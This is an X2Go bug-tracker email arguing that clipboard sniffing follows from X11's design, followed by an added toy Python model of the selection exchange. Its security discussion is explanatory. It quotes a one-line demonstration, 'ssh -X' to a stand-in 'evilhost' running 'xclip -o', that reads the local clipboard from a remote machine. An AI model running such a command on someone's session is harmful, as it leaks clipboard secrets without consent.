Date: Mon, 1 Jul 2013 16:01:32 +0200
From: Alexander Wuerstlein
To: Christoph Anton Mitterer, 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Message-ID: <20130701140132.GQ2447@cip.informatik.uni-erlangen.de>

On 13-07-01 15:03, Christoph Anton Mitterer wrote:
> On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote:
> > Yes, other related tools like X11. x2go is basically just a faster
> > version of the traditional xforwarding.
> > In X11 every client can always
> > access the clipboard/selection/etc., so you will also have the same
> > security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> > demonstrates this.
> Well but that "argument" doesn't really count:
> 1) Just because others do it plainly insecure, you cannot do it like
> this as well... like as if Gentoo would say "if Debian breaks their
> OpenSSL entropy, we should do so, too"... o.O

It isn't like that at all, X11 clients and servers have to comply with
the respective parts of the protocol. If the protocol demands insecure
behaviour, it's a design bug, or maybe, like in this case, a compromise
nobody likes: Since in X11 clients handle all the shortcuts and mouse
button events, since clients or toolkits handle the widgets, the only
option to implement C&P is to have clients ask the server for the
clipboard or selection contents. It's more a "there is no other way to
do it except to make it unusable" kind of problem imho.

> 2) Literally no one who has a decent mind of security, will allow other
> hosts to directly access their X server.. because then you're (security
> wise) anyway screwed...

I'm not only talking about 'xhost +' and the like, this would of course
be a major problem for more reasons than only the clipboard. And if you
wouldn't trust a host with 'ssh -X', then you also shouldn't trust it
with x2go. Just think of x2go as a variant of 'ssh -X' with image
compression and some extras. X11 protocol firewalling is not really one
of those extras. And since the x2goclient will always run in your local
X session, it will always be able to read your clipboard.

> And I thought NX would secure what's sent from remote in order to not
> being able to overtake the input/output devices of the hosts (whole)
> Xserver).

In a way, yes. Afaik you can avoid certain attacks of the "I'll attach
to the root window and get all key events" kind since windowed x2go
sessions give you a separate root window.
But I imagine there are more problems out there nobody thought of yet.

Ciao,

Alexander Wuerstlein.
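
Added example, not part of the original message or of the X2Go code: a toy Python model of the X11 selection exchange the reply describes (SetSelectionOwner, ConvertSelection, SelectionRequest, SelectionNotify), showing that the server relays a paste request from any connected client to the selection owner. The class names, window ids, the "XSEL_DATA" property name and the sample data are assumptions made for illustration; no real X server or Xlib is involved.

```python
# Toy model of the X11 selection exchange; class and property names are illustrative.
class Server:
    def __init__(self):
        self.owners, self.windows, self.log = {}, {}, []

    def connect(self, name):
        window = 0x400000 + len(self.windows)      # constructed window id
        self.windows[window] = Client(name, window, self)
        return self.windows[window]

    def set_selection_owner(self, selection, client):
        self.log.append(("SetSelectionOwner", client.name))
        self.owners[selection] = client

    def convert_selection(self, selection, target, requestor):
        self.log.append(("ConvertSelection", requestor.name))
        owner = self.owners.get(selection)
        if owner is None:
            return                                  # nobody owns it: nothing to paste
        # The core protocol has no per-client check here: the server
        # forwards the request of any connected client to the owner.
        self.log.append(("SelectionRequest", owner.name))
        owner.on_selection_request(requestor.window, target)

    def change_property(self, window, prop, data):
        self.windows[window].properties[prop] = data


class Client:
    def __init__(self, name, window, server):
        self.name, self.window, self.server = name, window, server
        self.clipboard, self.properties = b"", {}

    def copy(self, data):
        self.clipboard = data
        self.server.set_selection_owner("CLIPBOARD", self)

    def on_selection_request(self, requestor_window, target):
        # The owner sees only a window id, not which program is asking.
        self.server.change_property(requestor_window, "XSEL_DATA", self.clipboard)
        self.server.log.append(("SelectionNotify", self.name))

    def paste(self):
        self.server.convert_selection("CLIPBOARD", "UTF8_STRING", self)
        return self.properties.pop("XSEL_DATA", None)


def demo():
    server = Server()
    editor = server.connect("editor")
    proxy = server.connect("x2goclient")            # just another local client
    editor.copy(b"constructed-secret")
    return proxy.paste(), server.log
```

In the model, as in the description above, the client named "x2goclient" gets the data simply because it is connected to the same server as the owner.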